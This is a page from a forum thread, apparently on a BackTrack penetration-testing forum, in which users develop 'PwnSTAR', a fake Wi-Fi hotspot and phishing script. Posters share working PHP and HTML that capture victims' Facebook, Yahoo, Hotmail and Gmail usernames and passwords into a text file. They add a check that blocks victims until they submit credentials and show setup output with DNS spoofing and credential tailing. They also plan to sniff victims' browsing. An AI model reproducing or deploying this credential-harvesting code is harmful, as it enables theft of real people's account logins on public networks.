Page 2 of 14 FirstFirst 123412 ... LastLast
Results 11 to 20 of 136

Thread: Soft AP / Phishing Script [Release]

  1. #11
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    VulpArgenti, thank you for your work on this script, it works very well.

    I have made some changes to the html and php portions of this script and wanted to share them here.

    I wanted to know which service the victim/user was trying to login with so I modified lines 37 through 40 of index.html to include name="service" on the login buttons:
    Code:
    	<td align=center ><input type="submit" value="login" name="facebook" /></td>
    	<td align=center ><input type="submit" value="login" name="yahoo" /></td>
    	<td align=center ><input type="submit" value="login" name="hotmail" /></td>
    	<td align=center ><input type="submit" value="login" name="gmail" /></td>
    I've made several modifications to process-form-data.php so I'll post the entire file here. I added the handling of the names of the buttons, I changed the layout of the .txt file it creates, I made it display an error and refresh back to the login page so they don't keep refreshing and adding the credentials to the file over and over, and shortened the sleep(4) to sleep(1) because 4 seemed to be too long to me (just preference maybe).

    Here's the new process-form-data.php
    Code:
    <?php
    $name = $_POST['login'];
    $password = $_POST['password'];
    
    if($_POST['facebook']){
    	$service = "facebook";
    }elseif($_POST['yahoo']){
    	$service = "yahoo";
    }elseif($_POST['hotmail']){
    	$service = "hotmail";
    }elseif($_POST['gmail']){
    	$service = "gmail";
    }
    
    $accinfo = "login: $name\npass: $password\nservice: $service\n-----\n";
    
    $fp = fopen("formdata.txt", "a");
    fwrite($fp, $accinfo);
    fclose($fp);
    
    sleep(1);
    
    $error =
    "<html>\n" .
    "<head>\n" .
    "<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" .
    "</head>\n" .
    "<body>\n" .
    "<center><p1><b>Login incorrect.</b></p1></center>\n" .
    "<center><p1>You are being redirected.</p1></center>\n" .
    "</body>\n" .
    "</html>";
    
    echo $error;
    
    //uncomment to debug $_POST variable:
    //print_r($_POST);
    
    //uncomment to list name, password, and service variables:
    //echo('$name: ' . $name . '<br>$password: ' . $password . '<br>$service: ' . $service);
    
    ?>

  2. #12
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    #resize -s 38 85 &> /dev/null # resize the terminal
    commented out because it really f*cks up the resize
    I've now tested this and it looks as though this is a KDE problem (I see the colours are not great either). I'm not really interested in exploring KDE so for the moment KDE users should comment out this line, and I'll either fix it or remove it from the next release.

  3. #13
    Just burned his ISO
    Join Date
    Apr 2012
    Posts
    1

    Default Re: Soft AP / Phishing Script [Release]

    Had to remove the resizing and colouring it messed up on KDE.
    Otherwise looks good, get a few errors like no such thing as dhcp3.

    The login page simply lets you login once you press "Login" even if you dont enter credentials, pretty annoying.

  4. #14
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    @devi1,

    Great contribution - nice to see the open-source community in action.

    Two questions:

    1. Can you amend the php to allow the victim to continue on to browse, once they have entered credentials? Something like:

    Code:
    if [no credentials entered], then error function (same as you have now)
    else [credentials entered], echo "Thank you. Refresh browser to continue browsing"
    I can look at coding iptables to support this, and have PwnSTAR sniff their activities.

    2. Can I put your php up on the googlecode page (with full accreditation of course)?

    Regards
    Vulpi

  5. #15
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    @Vulpi,

    1. I was thinking of this and was not too sure how to go about doing that, if I can figure it out i'd definitely impliment this. Someone else with more experience may get to it first.

    2. If you like what I've done then feel free to include it in the project.

  6. #16
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    I found this page with information on setting up a captive portal with iptables and php: http://www.andybev.com/index.php/Usi...captive_portal

    it looks like it would be fairly simple to add this to your script. This may also require adding some kind of setup script that creates the rmtrack file and modifies the sudoers file to allow apache to modify iptables.

  7. #17
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    amend the php
    It seems php is similar to bash: this does the job;

    PHP Code:
    if(($password == "") || ($name == "")){ 
    echo 
    $error
    }else{ echo 
    $success

    ---------------------------------------------------------------

    captive portal... fairly simple to add this to your script
    We'll see how simple!!
    Last edited by VulpiArgenti; 04-09-2012 at 09:00 AM.

  8. #18
    Junior Member
    Join Date
    Dec 2011
    Posts
    30

    Default Riferimento: Re: Soft AP / Phishing Script [Release]

    hello VulpiArgenti, thank you for your advices, but that's exactly how i am configuring everything. anyway i suppose my problem resides in the dhcp...the victim connects to the fake ap but there is no transmission of data at all (checking the victim pc i have only trasmitted packets victim->fake , and 0 received. i tried with purging and reinstalling the whole dhcp3 via apt, (no result), and then trying on a fresh bt5r2 gnome 64 , and nothing yet. i am using an alfa awus036nh as fake ap, so i don't think the problem could be the receiver (you have the same one if i recall correctly :P) . could i provide more informations? just tell me, right now i'm very curious to discover the real problem! thanks!




    Quote Originally Posted by VulpiArgenti View Post
    Hi bugme,

    Thanks for your comments - much appreciated.

    Regarding the Eterm colours, you can see on the screenshot that they should be a very readable purple/yellow. Please launch Eterm then adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.

    You shouldn't need to create any additional directories once you have moved "hotspot" into /var/www. Your directory setup should look like this:

    Code:
    root@bt:~# ls /var/www
    hotspot  index.html  wstool
    root@bt:~# ls /var/www/hotspot
    facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
    formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif
    And then running the script (red is your entries):
    Code:
    Setting up the web page
    
    MUST have directory structure set up correctly
    
    Available web directories:
    hotspot
    index.html
    wstool
    
    Select directory
    hotspot
    
    hotspot/index moved into position
    
    Starting Apache...
     * Starting web server apache2                                                [ OK ] 
    ...success
    
    Starting DNS spoofing...
    
    Do you want to tail the credentials txtfile? (y/n)
    y
    
    
    facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
    formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif
    
    Enter name of txtfile
    formdata.txt
    
    Web Server attack running
    Try again with it set up like this.

    If there are still problems we need to troubleshoot your victim's connection. Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?

  9. #19
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Riferimento: Re: Soft AP / Phishing Script [Release]

    Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?
    Hi bugme, would you copy and post the contents of these 2 eterms, after your victim has associated?

  10. #20
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    [Update]

    Version 0.51 out:

    • Improved navigation and trapping (thanks snafu777 for the motivation)
    • Recognises KDE, doesn't attempt resize
    • Changed background to black (better in KDE)
    • Made input technique more obvious (thanks nivong)
    • Improved error handling
    • Various minor bugfixes
    • Added option of stopping dnsspoof to allow internet access once credentials are harvested. Note this must be done manually.
    • Improved hotspot php (with assistance from devi1). Can no longer bypass the login page.


    Please READ THE SCRIPT, it contains a lot of comments (and should help you understand the mechanics of these simple attacks, as well as learn basic bash coding).
    I also forgot to mention in my initial post that the comments section of the script contains acknowledgement of other scripts I looked at (and I recommend you do the same).

    Meet the new improved PwnSTAR at: http://code.google.com/p/pwn-star/downloads/list


    [Coming next - a functional captive portal page with multi-client handling (Hopefully. Maybe)]

Page 2 of 14 FirstFirst 123412 ... LastLast

Similar Threads

  1. SET 0.7 phishing demo
    By pentest09 in forum BackTrack Videos
    Replies: 7
    Last Post: 12-19-2010, 10:31 PM
  2. Soft AP Upside Down image help pls, script nearly works
    By spriggsy in forum Beginners Forum
    Replies: 0
    Last Post: 11-05-2010, 12:01 PM
  3. Soft AP Script not working?
    By spriggsy in forum Beginners Forum
    Replies: 1
    Last Post: 05-19-2010, 01:08 PM
  4. Soft AP bash script
    By junke1990 in forum OLD Wireless
    Replies: 1
    Last Post: 04-03-2010, 08:30 AM
  5. backtrack 4 pre release user login script
    By eidos in forum OLD Newbie Area
    Replies: 1
    Last Post: 07-30-2009, 09:57 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •